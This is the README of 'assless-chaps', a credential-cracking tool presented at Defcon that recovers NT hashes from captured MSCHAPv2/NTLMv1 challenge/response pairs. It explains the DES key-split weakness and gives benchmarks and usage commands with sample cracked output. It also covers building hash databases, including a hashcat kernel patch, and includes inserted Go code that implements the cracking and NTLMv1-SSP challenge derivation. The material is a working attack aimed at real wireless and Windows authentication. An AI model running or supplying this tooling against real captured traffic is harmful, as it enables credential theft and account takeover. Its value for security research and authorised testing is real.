assless-chaps

Crack MSCHAPv2/NTLMv1 challenge/responses quickly using a database of NT hashes

Introduction

Assless CHAPs is an efficient way to recover the NT hash used in an MSCHAPv2/NTLMv1 exchange when you have the challenge and response (e.g. from a WiFi EAP WPE attack).

It requires a database of NT hashes; instructions on how to build one from existing lists, or with hashcat from wordlists and rules, are given below. I've included a sample database built from SecLists, which you'll need to bunzip first.

Technique

An MSCHAPv2 exchange does not require the clear-text password to be "cracked"; we merely need the NT hash that was used.

MSCHAPv2 splits the NT hash into three parts and uses each part as a separate DES key to encrypt the same challenge (derived from the peer and authenticator challenges). The NT hash is split into two 7-byte keys and one 2-byte key, so the last key is padded with NULLs to reach the required key length. Those two bytes can be brute forced rapidly, because a DES operation is cheap and the keyspace is only 65 535. Once we have those two bytes, we look up every NT hash in our database that ends in them, which leaves a much smaller set of possible hashes to check.

This is a form of space vs time tradeoff, similar to a rainbow table. It's also a form of hash shucking.
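The technique above as an added Go example; this is not the repository's Python or Rust code. It uses the standard-library DES to brute force the two trailing bytes, then checks the candidates a database lookup would return. The in-memory sampleDB map is a constructed stand-in for the SQLite database, and the challenge/response pair is the one from the Usage section.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
)

// desBlock DES-encrypts one 8-byte block under a 7-byte key (crypto/des wants 8 bytes with parity).
func desBlock(k7, block []byte) []byte {
	v := binary.BigEndian.Uint64(append([]byte{0}, k7...)) // 56-bit key value
	key := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		key[i] = byte(v << 1) // seven key bits; the low (parity) bit is ignored by DES
		v >>= 7
	}
	c, _ := des.NewCipher(key) // only fails on a wrong key length
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// bruteForceTail recovers the last two NT-hash bytes: the third DES key is those two
// bytes padded with five NULs, so at most 65536 tries. Returns them and the loop index.
func bruteForceTail(challenge, third []byte) ([]byte, int) {
	key := make([]byte, 7)
	for i := 0; i < 65536; i++ {
		key[0], key[1] = byte(i>>8), byte(i)
		if bytes.Equal(desBlock(key, challenge), third) {
			return key[:2], i
		}
	}
	return nil, -1
}

// recoverNTHash runs the whole technique. db stands in for the SQLite table and
// maps a 4-hex-char tail to the (first14, second14) rows stored under it.
func recoverNTHash(challengeHex, responseHex string, db map[string][][2]string) string {
	challenge, _ := hex.DecodeString(challengeHex)
	resp, _ := hex.DecodeString(responseHex)
	tail, _ := bruteForceTail(challenge, resp[16:24])
	for _, row := range db[hex.EncodeToString(tail)] {
		k, _ := hex.DecodeString(row[0] + row[1]) // two 7-byte DES keys
		if bytes.Equal(desBlock(k[:7], challenge), resp[:8]) &&
			bytes.Equal(desBlock(k[7:], challenge), resp[8:16]) {
			return row[0] + row[1] + hex.EncodeToString(tail)
		}
	}
	return ""
}

// Constructed stand-in for rockyou.db: a decoy row sharing the tail, then the NT hash of "password".
var sampleDB = map[string][][2]string{"586c": {
	{"00000000000000", "00000000000000"}, {"8846f7eaee8fb1", "17ad06bdd830b7"}}}
```

The decoy row shows why the first two DES blocks must still be verified: sharing the tail is not enough.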

Presentation

This was first presented at Defcon 29's RF Hacking Village. The slides are included in this repository.

Speed

Here is the comparison for three sample challenge/responses and three different wordlists: a small private one, rockyou, and the Have I Been Pwned list. These were run on my MacBook Pro 2016. Hashcat is using this hash shucking kernel and the two built-in GPUs, with a pure rather than an optimised kernel (as the latter doesn't exist yet). Hash 3 isn't in any of the lists, to simulate worst-case performance. I'm not including the time hashcat takes to build the dictionary cache on first run.

Hash 1

Small hashlist:

hashcat 0.50s user 0.27s system 55% cpu 1.405 total (8597.8 kH/s)
assless 0.05s user 0.00s system 294% cpu 0.018 total

Rockyou hashlist:

hashcat 2.67s user 0.51s system 93% cpu 3.413 total
assless 0.05s user 0.01s system 281% cpu 0.021 total

HIBP hashlist:

hashcat 59.97s user 11.72s system 136% cpu 52.603 total (5620.6 kH/s)
assless 0.05s user 0.00s system 292% cpu 0.018 total

Hash 2

Small hashlist:

hashcat 0.51s user 0.27s system 55% cpu 1.409 total (8704.7 kH/s)
assless 0.03s user 0.00s system 248% cpu 0.012 total

Rockyou hashlist:

hashcat 2.20s user 0.46s system 110% cpu 2.409 total (5798.4 kH/s)
assless 0.03s user 0.00s system 231% cpu 0.015 total

HIBP hashlist:

hashcat 65.37s user 12.74s system 135% cpu 57.712 total (5768.7 kH/s)
assless 0.03s user 0.00s system 249% cpu 0.013 total

Hash 3

Hash 3 doesn't exist in any of the hashlists to simulate a worst case lookup performance.

Small hashlist:

hashcat 0.67s user 0.34s system 66% cpu 1.526 total (7550.1 kH/s)
assless 0.02s user 0.00s system 211% cpu 0.012 total

Rockyou hashlist:

hashcat 2.71s user 0.52s system 94% cpu 3.415 total (5685.4 kH/s)
assless 0.02s user 0.01s system 181% cpu 0.014 total

HIBP hashlist:

hashcat 125.19s user 27.62s system 139% cpu 1:49.75 total (5634.9 kH/s)
assless 0.06s user 0.03s system 115% cpu 0.075 total

Installing

The Rust version requires SQLite 3.6.8 or newer.

The Python version requires python3, sqlite3 and pycryptodome.

The database creation utility requires python3 and the sqlite3 CLI.

Compiling

This only applies to the Rust version. You'll need cargo.

With cargo installed, change to the assless-chaps-rs directory and build with: cargo build --release

The resulting binary will be in the target/release/ directory.

Usage

Assless requires the challenge, the response and a database of NT hashes. Optionally, the Python version can use the bundled optimised two-byte lookup file. The simplest usage looks like this:

./assless-chaps <Challenge> <Response> <hashes.db>

For example:

./assless-chaps 5d79b2a85966d347 556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87 rockyou.db

The output should look like:

[-] Two byte lookup file not provided, will brute force instead.
[+] Found in 22636 tries: 586c
[-] Found 222 hashes ending in 586c
[+] Found hash: 8846f7eaee8fb1
[-] Found after 186 hashes.
[+] Found hash: 17ad06bdd830b7
[+] Full hash: 8846f7eaee8fb117ad06bdd830b7586c

The final full hash 8846f7eaee8fb117ad06bdd830b7586c is the NT hash of the password "password".

Two-byte lookup - Python only

I spent some time building a list of all 65 535 possible two-byte values, sorted by how often they occur across a large corpus of passwords. This file is included as twobytes. You can just pass it as the fourth argument to assless.

This typically saves a few rounds of DES but doesn't make a large speed difference; it might if you're processing many hashes.

python3 assless-chaps.py 5d79b2a85966d347 556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87 rockyou.db twobytes

[+] Found in 65533 tries: 586c
[-] Found 222 hashes ending in 586c
[+] Found hash: 8846f7eaee8fb1
[-] Found after 186 hashes.
[+] Found hash: 17ad06bdd830b7
[+] Full hash: 8846f7eaee8fb117ad06bdd830b7586c

Creating your own hash dictionary

The mksqlitedb.py file will assist in turning a CSV hash file into the database.

python3 mksqlitedb.py <database name> <csv file>

The CSV file requires three columns:

  • The last two bytes of the hash (the last four ASCII characters)
  • The first 7 bytes (the first 14 ASCII characters)
  • The second 7 bytes (the 15-29th ASCII characters)

For example, the hash 8846f7eaee8fb117ad06bdd830b7586c will become:

586c,8846f7eaee8fb1,17ad06bdd830b7

An example sed transformation for this would be:

echo 8846f7eaee8fb117ad06bdd830b7586c | sed "s/^\(.\{14\}\)\(.\{14\}\)\(.\{4\}\)$/\3,\1,\2/"

You can either take an existing list of hashes (such as the Have I Been Pwned lists) or generate your own with hashcat and your favourite wordlist/rules combinations.

Using Have I Been Pwned

The HIBP password lists are already downloadable as NT hashes; you just need to remove the count from each line and convert the file to the CSV format for import into the database.

This can be done using the standard Unix utility sed like so:

sed "s/^\(.\{14\}\)\(.\{14\}\)\(.\{4\}\):.*/\3,\1,\2/" pwned-passwords-ntlm-ordered-by-hash.txt > hibp.csv

After which it can be imported using: python3 mksqlitedb.py hibp.db hibp.csv

Converting a wordlist to a hashlist

To convert a straight wordlist to a hashlist of nthashes, you can use nthasher which can do large wordlists fast. The resulting hashes will need to be turned into the required CSV format as described above.

A much slower nthasher that outputs hashes directly in the required CSV format is included in this repository, and is simply run with:

python3 nthash-from-clear.py <wordlist> > hashlist.csv

If you want to expand the wordlist with rules see the next section on using hashcat.

Using hashcat to create a hash csv file from wordlists and rules

You'll need to make a small code change to the mode 1000 OpenCL kernel so that it outputs every hash it computes, rather than only those matching your crack candidate. Once patched, it emits the hashes in the CSV format required.

  • Change to your hashcat OpenCL directory: cd hashcat/OpenCL
  • Apply the patch: patch < m01000_a0-pure.cl.patch
  • Prepare a file with an impossible to crack NT hash like echo 11111111111111111111111111111111 > impossible_hash
  • Crack as normal, but disable your potfile and redirect the output to a file: hashcat -m1000 impossible_hash rockyou.txt -r best64.rule --potfile-disable --quiet > rockyou.csv
  • Create your hashes database: python3 mksqlitedb.py rockyou.db rockyou.csv

A note on disk space and file sizes

The SQLite database is typically 61% larger than the CSV file used to create it. Creating the database can also take some time, depending on the size of the files. Prepare your filesystem requirements accordingly.

Here is an example using the rockyou dictionary:

  • Base rockyou dictionary 129M
  • hashcat generated rockyou.csv 462M
  • Resulting SQLite database rockyou.db 746M
  • BZip2 maximum compression rockyou.db.bz2 339M

You could save space by converting and inserting each hash dynamically and skipping the need for the intermediary CSV file.

NTLMv1 SSP

NTLMv1 works in exactly the same way, unless it is using SSP. You'll know SSP is in use if the LM response ends in a run of zeros. Use the included ntlm-ssp.py to derive the server challenge that assless needs.

Run it like this: python3 ntlm-ssp.py <lm response> <challenge>

For example, using the NTLMv1-SSP challenge/response from the hashcat example hashes: u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

You would pass in the LM and challenge like so:

python3 ntlm-ssp.py 338d08f8e26de93300000000000000000000000000000000 cb8086049ec4736c

And get the following response:

The server challenge is: 724edf24aea0d68b

Which can then be cracked with assless-chaps like normal:

./assless-chaps 724edf24aea0d68b 9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41 hashes.db
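The derivation ntlm-ssp.py performs, as an added Go example that is not the repository's own code. With extended session security, the NT response is DES-encrypted over the first 8 bytes of MD5(server challenge || client challenge), where the client challenge is the first 8 bytes of the zero-padded LM response; the function names are my own, and the inputs are the hashcat example values above.

```go
package main

import (
	"bytes"
	"crypto/md5"
	"encoding/hex"
	"errors"
)

// isSSPResponse reports whether an LM response has the NTLMv1-SSP shape the
// README describes: an 8-byte client challenge followed by sixteen zero bytes.
func isSSPResponse(lm []byte) bool {
	return len(lm) == 24 && bytes.Equal(lm[8:], make([]byte, 16))
}

// sspServerChallenge derives the 8-byte value the NT response is really
// DES-encrypted over when SSP is in use: the first 8 bytes of MD5 over the
// server challenge followed by the client challenge from the LM response.
// Inputs and output are hex strings, matching the ntlm-ssp.py invocation.
func sspServerChallenge(lmResponseHex, serverChallengeHex string) (string, error) {
	lm, err := hex.DecodeString(lmResponseHex)
	if err != nil {
		return "", err
	}
	sc, err := hex.DecodeString(serverChallengeHex)
	if err != nil {
		return "", err
	}
	if len(sc) != 8 || !isSSPResponse(lm) {
		return "", errors.New("need an 8-byte server challenge and a 24-byte SSP-style LM response")
	}
	buf := append(append(make([]byte, 0, 16), sc...), lm[:8]...)
	sum := md5.Sum(buf)
	return hex.EncodeToString(sum[:8]), nil
}
```

A plain NTLMv1 exchange (no zero run in the LM response) is rejected rather than silently derived, since its NT response was computed over the original server challenge.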
